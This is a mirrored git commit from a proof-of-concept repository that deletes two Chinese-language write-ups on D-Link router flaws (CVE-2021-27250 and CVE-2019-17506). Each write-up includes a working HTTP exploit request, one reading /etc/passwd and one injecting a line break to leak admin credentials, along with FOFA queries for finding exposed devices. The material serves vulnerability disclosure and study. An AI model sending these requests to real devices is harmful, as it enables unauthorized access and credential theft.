mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-05 10:50:23 +00:00
更新漏洞
This commit is contained in:
parent
3c0d945efa
commit
5ea25c1a8b
@ -1,33 +0,0 @@
|
||||
# D-Link DAP-2020 webproc 任意文件读取漏洞 CVE-2021-27250
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
近日D-Link发布公告[1]称旗下产品DAP-2020存在任意文件读取漏洞,CVE编号为CVE-2021-27250,目前已在硬件版本:A1,固件版本:1.01 上测试了PoC,由于漏洞影响核心组件,因此其他版本也可能受到此漏洞的影响
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
D-LINK DAP-2020
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
body="DAP-1360" && body="6.05"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面
|
||||
|
||||

|
||||
|
||||
验证POC
|
||||
|
||||
```
|
||||
POST /cgi-bin/webproc
|
||||
|
||||
getpage=html%2Findex.html&errorpage=/etc/passwd&var%3Amenu=setup&var%3Apage=wizard&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=123&%3Aaction=login&%3Asessionid=3c1f7123
|
||||
```
|
||||
|
||||

|
||||
@ -1,39 +0,0 @@
|
||||
# D-Link Dir-645 getcfg.php 账号密码泄露漏洞 CVE-2019-17506
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
D-Link DIR-868L B1-2.03和DIR-817LW A1-1.04路由器上有一些不需要身份验证的Web界面。攻击者可以通过SERVICES的DEVICE.ACCOUNT值以及AUTHORIZED_GROUP = 1%0a来获取getcfg.php的路由器的用户名和密码(以及其他信息)。这可用于远程控制路由器
|
||||
|
||||
## 漏洞影响
|
||||
|
||||
```
|
||||
D-Link Dir 系列多个版本
|
||||
```
|
||||
|
||||
## FOFA
|
||||
|
||||
```
|
||||
app="D_Link-DIR-868L"
|
||||
```
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
登录页面如下
|
||||
|
||||

|
||||
|
||||
发送下请求包
|
||||
|
||||
```plain
|
||||
POST /getcfg.php HTTP/1.1
|
||||
Host:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||
Content-Length: 61
|
||||
|
||||
SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
|
||||
```
|
||||
|
||||

|
||||
|
||||
获取到路由器账号密码即可登录后台
|
||||
Loading…
x
Reference in New Issue
Block a user